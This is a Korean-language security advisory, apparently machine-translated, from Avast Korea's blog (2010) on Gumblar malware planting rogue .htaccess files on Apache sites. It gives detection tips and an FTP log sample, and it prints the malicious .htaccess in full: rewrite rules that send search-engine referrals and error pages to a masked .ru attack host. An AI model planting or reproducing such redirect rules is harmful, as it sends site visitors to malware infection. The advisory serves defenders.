5억명이 사용하는 AVAST 안티바이러스 백신 자세히보기

새로운 소식

Gumblar (간부라) 바이러스에 의한 새로운 홈페이지 변조 피해 확인

어베스트코리아 2010. 3. 8. 09:44

※ 본주의는 2009 년 12 월 25 일 【Gumblar (간부라) 바이러스의 조직 감염 확대와 홈페이지 변조 피해 증가에 따른 대책의 확인에 대한 주의 전달입니다.

Apache 설정 파일인 htaccess 파일을 주의하여야 합니다. "htaccess"불법 업로드를 수행하는 Gumblar 바이러스의 활동을 여러 사이트에서 확인했습니다. 현재 알려진 것은 다음과 같은 내용입니다.

[공격 확인 일】

  • LAC이 공격을 처음으로 인식하고있는 것은 2010 년 3 월 1 일입니다
  • FTP 전송 로그에서 적어도 2010 년 1 월 말에는이 공격이 발생했던 것으로 추측하고있습니다

【동작 개요]

이. htaccess 파일을 두는 영향은 주요 검색 사이트의 액세스 및 404,403 등 오류가 Apache 리디렉션 공격 사이트로 전달되는 것입니다. 공격 사이트로 전송되면, 다른 Gumblar 공격과 마찬가지로 악성 프로그램 감염 피해를 遭わ 수 추측됩니다.

[기존 Gumblar의 차이점]

전통적인 Gumblar 공격과 차이점은 다음 2 가지가 발견됩니다.

1. 사용자는 JavaScript의 대책만으로는 막을 수 없다
Firefox + NoScript 조합은 막을 수 없을 가능성이 있고 RequestPolicy 같은 리디렉션 대책이 가능한 추가 기능을 이용할 필요가있습니다.
2. 콘텐츠 파일 감시만으로는 알 수 없다
콘텐츠 파일 자체는 손상되지 않으며, 또한 북마크 (즐겨찾기) 및 URL 직접 입력하여 사이트를 볼 경우에는 영향을받지 않으므로, Web 사이트 관리자가 피해를 알아채지.

[Web 서버 관리자 조치】

부정하게한다. htaccess 파일이 존재하지 않는지 확인하십시오. FTP 전송 로그. htaccess 파일이 업로드되지 않았는지 확인하는 것도 유효합니다.

확인된 로그 샘플

FTP
Jan dd hh : mm : ss 2010 1 xxxx 1278 / home / xxxx / .htaccess b _ ir xxxx ftp 0 * c

※ 현재 최상위 디렉토리에 단발로 업로드되어 있는지 확인합니다.

업로드된다. "htaccess"파일

# HostRule
RewriteEngine On
RewriteCond % (HTTP_REFERER) .* google .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* ask .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* yahoo .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* excite .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* altavista .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* msn .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* netscape .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* aol .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* hotbot .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* goto .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* infoseek .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* mamma .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* alltheweb .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* lycos .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* search .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* metacrawler .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* yandex .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* rambler .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* mail .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* dogpile .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* ya .* $ [NC]
RewriteRule ^(.*)$ http:// ********. ru / [R = 301, L]

ErrorDocument 401 http:// ********. ru /
ErrorDocument 403 http:// ********. ru /
ErrorDocument 404 http:// ********. ru /
ErrorDocument 500 http:// ********. ru /
# / HostRule



'새로운 소식' 카테고리의 다른 글

어베스트! www.avast.eu 접속 주의 사항  (0) 2010.04.02
야후, 폭스, 구글이 제공하는 광고로 인해 악성 코드 퍼져  (0) 2010.03.30
avast! 5 한글판 출시  (0) 2010.02.02
프리미엄 안티 바이러스 어베스트 5.0 버전 출시  (0) 2010.01.20
매일매일 당첨자 공지 - 서동갑님 리베라호텔 숙박권 당첨되었습니다  (0) 2010.01.02

'새로운 소식'의 다른글

  • 현재글Gumblar (간부라) 바이러스에 의한 새로운 홈페이지 변조 피해 확인

관련글

티스토리툴바